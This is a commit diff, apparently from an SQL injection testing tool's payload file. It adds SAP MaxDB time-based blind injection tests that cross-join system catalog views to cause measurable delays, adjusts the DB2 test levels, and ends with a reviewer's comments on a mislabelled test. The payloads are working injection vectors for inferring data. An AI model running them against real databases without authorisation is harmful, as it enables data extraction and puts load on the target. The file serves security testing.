

Commit bedf16b

committed
adding payloads for time-based injection on SAP MaxDB (heavy query)
1 parent d0490cc commit bedf16b

1 file changed

Lines changed: 62 additions & 4 deletions


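--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -2196,10 +2196,49 @@ Formats:
 </details>
 </test>
 
+<test>
+<title>SAP MaxDB AND time-based blind (heavy query)</title>
+<stype>5</stype>
+<level>3</level>
+<risk>2</risk>
+<clause>1,2,3</clause>
+<where>1</where>
+<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1, (SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2, (SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
+<request>
+<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1, DOMAIN.COLUMNS AS T2, DOMAIN.TABLES AS T3)</payload>
+</request>
+<response>
+<time>[DELAYED]</time>
+</response>
+<details>
+<dbms>SAP MaxDB</dbms>
+</details>
+</test>
+
+<test>
+<title>SAP MaxDB AND time-based blind (heavy query - comment)</title>
+<stype>5</stype>
+<level>5</level>
+<risk>2</risk>
+<clause>1,2,3</clause>
+<where>1</where>
+<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1, (SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2, (SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
+<request>
+<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1, DOMAIN.COLUMNS AS T2, DOMAIN.TABLES AS T3)</payload>
+<comment>--</comment>
+</request>
+<response>
+<time>[DELAYED]</time>
+</response>
+<details>
+<dbms>SAP MaxDB</dbms>
+</details>
+</test>
+
 <test>
 <title>DB2 AND time-based blind (heavy query)</title>
 <stype>5</stype>
-<level>2</level>
+<level>3</level>
 <risk>2</risk>
 <clause>1,2,3</clause>
 <where>1</where>
@@ -2234,7 +2273,7 @@ Formats:
 <dbms>DB2</dbms>
 </details>
 </test>
-<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
+<!-- TODO: if possible, add payload for Microsoft Access -->
 <!-- End of AND time-based blind tests -->
 
 
@@ -2416,10 +2455,29 @@ Formats:
 </details>
 </test>
 
+<test>
+<title>SAP MaxDB OR time-based blind (heavy query - comment)</title>
+<stype>5</stype>
+<level>4</level>
+<risk>3</risk>
+<clause>1,2,3</clause>
+<where>2</where>
+<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1, (SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2, (SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
+<request>
+<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1, DOMAIN.COLUMNS AS T2, DOMAIN.TABLES AS T3)</payload>
+</request>
+<response>
+<time>[DELAYED]</time>
+</response>
+<details>
+<dbms>SAP MaxDB</dbms>
+</details>
+</test>
+
 <test>
 <title>DB2 OR time-based blind (heavy query)</title>
 <stype>5</stype>
-<level>3</level>
+<level>4</level>
 <risk>3</risk>
 <clause>1,2,3</clause>
 <where>2</where>
@@ -2434,7 +2492,7 @@ Formats:
 <dbms>DB2</dbms>
 </details>
 </test>
-<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
+<!-- TODO: if possible, add payload for Microsoft Access -->
 <!-- End of OR time-based blind tests -->
 
 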
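Review bot: The added OR test is titled `SAP MaxDB OR time-based blind (heavy query - comment)`, but its `<request>` holds only a `<payload>` and no `<comment>` element, unlike the AND "(heavy query - comment)" test in the first hunk, which carries `<comment>--</comment>`. This looks like a copy-paste slip: either the title should read `(heavy query)` or the element is missing, and as written the title misdescribes what the test sends, which matters to anyone reading scan logs or deciding which tests may run. The DB2 heavy-query levels are also raised (2 to 3 for AND, 3 to 4 for OR) without a word in the commit message, so a line in the description stating the reason would help. Because these tests cross-join three catalog views, a comment above them such as `<!-- heavy query: cross join of DOMAIN.DOMAINS, DOMAIN.COLUMNS and DOMAIN.TABLES; expect noticeable load on the tested database -->` would tell operators why they sit at the higher levels.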
